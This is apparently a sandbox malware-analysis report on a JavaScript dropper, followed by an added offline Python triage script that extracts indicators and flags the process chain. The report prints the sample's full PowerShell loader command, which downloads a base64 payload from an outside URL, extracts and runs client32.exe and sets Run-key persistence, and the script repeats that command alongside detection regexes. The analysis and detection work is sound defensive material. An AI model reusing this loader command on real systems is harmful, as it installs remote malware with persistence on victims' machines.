Analysis
max time kernel: 122s
max time network: 125s
platform: windows7_x64
resource: win7-20230831-en
resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
submitted: 01/09/2023, 19:59
Static task: static1
Behavioral task: behavioral1
  Sample: package_details_____________________972968.js
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: package_details_____________________972968.js
  Resource: win10v2004-20230831-en
General
Target: package_details_____________________972968.js
Size: 3KB
MD5: bf6b4c0fc43b5aa0c9bb21b94d795240
SHA1: c6826cb6d10ef41842348522571cf28a25720f04
SHA256: 9101403bb729cabebd79206aad130293890154cd7a6fba3417471a645ea3ef25
SHA512: 173f1ce1ddb6d40d7faa59338a7dcd7a6c97249d467485b890116b84b9cdc480e8825cdeca845c527c6b98b203de898ac827027b56f78a5556429135b965c1e7
Malware Config
Extracted URL: https://svirtual.sanviatorperu.edu.pe/readme.txt
Signatures
Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  3     2580  powershell.exe
  4     2580  powershell.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2580  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2580  powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process      procid_target
  PID 1680 wrote to memory of 2580  1680  wscript.exe  28
  PID 1680 wrote to memory of 2580  1680  wscript.exe  28
  PID 1680 wrote to memory of 2580  1680  wscript.exe  28
Processes
C:\Windows\system32\wscript.exe (PID 1680)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\package_details_____________________972968.js
  Signatures: Suspicious use of WriteProcessMemory
  └ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2580)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='https://svirtual.sanviatorperu.edu.pe/readme.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

What the PowerShell stage does, read directly from the command line above:
  1. Runs with -Ex Bypass -NoP (execution policy bypassed, no profile loaded).
  2. Downloads https://svirtual.sanviatorperu.edu.pe/readme.txt as a string via System.Net.WebClient.DownloadString.
  3. Base64-decodes the string and writes the raw bytes to %APPDATA%\D\p.zip, creating the D directory if it does not exist.
  4. Extracts the archive into %APPDATA%\D with System.IO.Compression.ZipFile; on failure it prints 'Failed: ' and exits.
  5. If %APPDATA%\D\client32.exe exists after extraction, starts it (otherwise prints 'No exe.').
  6. Persists by creating a String value named X under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pointing at %APPDATA%\D\client32.exe.
The only configuration the sandbox extracted is the stage-2 URL; the contents of readme.txt and the identity of client32.exe are not recorded in this report.
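The following Python is an added triage example, not part of the sandbox report and not code from the sample. It works entirely offline on the command line the sandbox captured: it pulls the IoCs (URL, Run key, dropped file names) out of the one-liner, applies a parent/child rule (script host spawning powershell.exe with several loader behaviours at once) to a few constructed process-creation events, and replays the loader's decode step against a constructed stand-in for readme.txt, showing that stage 2 has to be base64 text that decodes to a ZIP containing client32.exe. The TECHNIQUE_MARKERS regexes, the min_techniques threshold, the two benign events and the placeholder ZIP are assumptions made for the example; the real stage-2 payload is not on the page.

```python
"""Offline triage of the wscript.exe -> powershell.exe chain recorded above.

Added example, not part of the sandbox report or of the sample. The CMDLINE
constant is copied from the report; everything else (markers, threshold,
benign events, placeholder ZIP) is constructed for illustration.
"""
import base64
import io
import re
import zipfile

# Command line of PID 2580, copied from the report's Processes section.
CMDLINE = (
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Ex Bypass -NoP -C "
    "\"$u='https://svirtual.sanviatorperu.edu.pe/readme.txt';"
    "$6=(New-Object System.Net.WebClient).DownloadString($u);"
    "$a=[System.Convert]::FromBase64String($6);"
    "$d=[System.Environment]::GetFolderPath('ApplicationData')+'\\D';"
    "if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };"
    "$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);"
    "try { Add-Type -A System.IO.Compression.FileSystem; "
    "[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};"
    "$e=Join-Path $d 'client32.exe';"
    "if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};"
    "$s=$d+'\\client32.exe';"
    "$k='HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run';$v='X';$t='String';"
    "New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;\""
)

# Loader behaviours worth keying on (assumed set); each is a regex over the command line.
TECHNIQUE_MARKERS = {
    "execution_policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "remote_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "archive_extract": re.compile(r"ExtractToDirectory|Expand-Archive", re.I),
    "launch_dropped_binary": re.compile(r"Start-Process", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\b", re.I),
}

# Script hosts whose PowerShell children deserve a closer look (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def extract_iocs(cmdline):
    """Return URLs, registry keys, dropped file names and matched techniques."""
    literals = re.findall(r"'([^']*)'", cmdline)  # PowerShell single-quoted strings
    return {
        "urls": [s for s in literals if re.match(r"https?://", s, re.I)],
        "registry_keys": [s for s in literals if re.match(r"HK(?:CU|LM|EY_[A-Z_]+):?\\", s)],
        # Join-Path $dir 'name' is how this loader names the files it drops.
        "dropped_files": re.findall(r"Join-Path\s+\$\w+\s+'([^']+)'", cmdline),
        "techniques": [n for n, rx in TECHNIQUE_MARKERS.items() if rx.search(cmdline)],
    }


def is_suspicious_chain(parent_image, child_image, child_cmdline, min_techniques=3):
    """Script host spawning PowerShell that shows several loader behaviours at once."""
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    child = child_image.rsplit("\\", 1)[-1].lower()
    if parent not in SCRIPT_HOSTS or child != "powershell.exe":
        return False
    return len(extract_iocs(child_cmdline)["techniques"]) >= min_techniques


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed process-creation events: the observed chain plus two benign look-alikes.
EVENTS = [
    ("C:\\Windows\\system32\\wscript.exe", PS, CMDLINE),
    ("C:\\Windows\\system32\\wscript.exe", PS,
     "powershell.exe -NoP -File \\\\fileserver\\logon\\map-drives.ps1"),  # constructed logon script
    ("C:\\Windows\\explorer.exe", PS, "powershell.exe -C Get-ChildItem"),  # constructed interactive use
]


def flagged_events(events=EVENTS):
    """Indices of the events the chain rule fires on."""
    return [i for i, (p, c, cl) in enumerate(events) if is_suspicious_chain(p, c, cl)]


def build_stage2_blob(placeholder_exe=b"MZ placeholder - not a real binary"):
    """Constructed stand-in for readme.txt: base64 of a ZIP that contains client32.exe."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("client32.exe", placeholder_exe)
    return base64.b64encode(buf.getvalue()).decode("ascii")


def inspect_stage2(b64_text):
    """Replay the loader's FromBase64String step offline and report what the archive carries."""
    raw = base64.b64decode(b64_text)
    if raw[:4] != b"PK\x03\x04":  # local file header every ZIP starts with
        return {"is_zip": False, "members": [], "has_client32": False}
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        members = zf.namelist()
    return {"is_zip": True, "members": members, "has_client32": "client32.exe" in members}


if __name__ == "__main__":
    print(extract_iocs(CMDLINE))
    print("flagged events:", flagged_events())
    print(inspect_stage2(build_stage2_blob()))
```

The chain rule deliberately requires several markers together rather than any single one: a logon script launched from wscript.exe with -NoP, or an admin running PowerShell from explorer.exe, stays below the threshold, while the observed command trips every marker in the set. inspect_stage2 is the step to run on the real readme.txt once it has been retrieved in a controlled way; if the decoded bytes do not begin with the ZIP header, the loader's ExtractToDirectory call would fall into its catch block and exit.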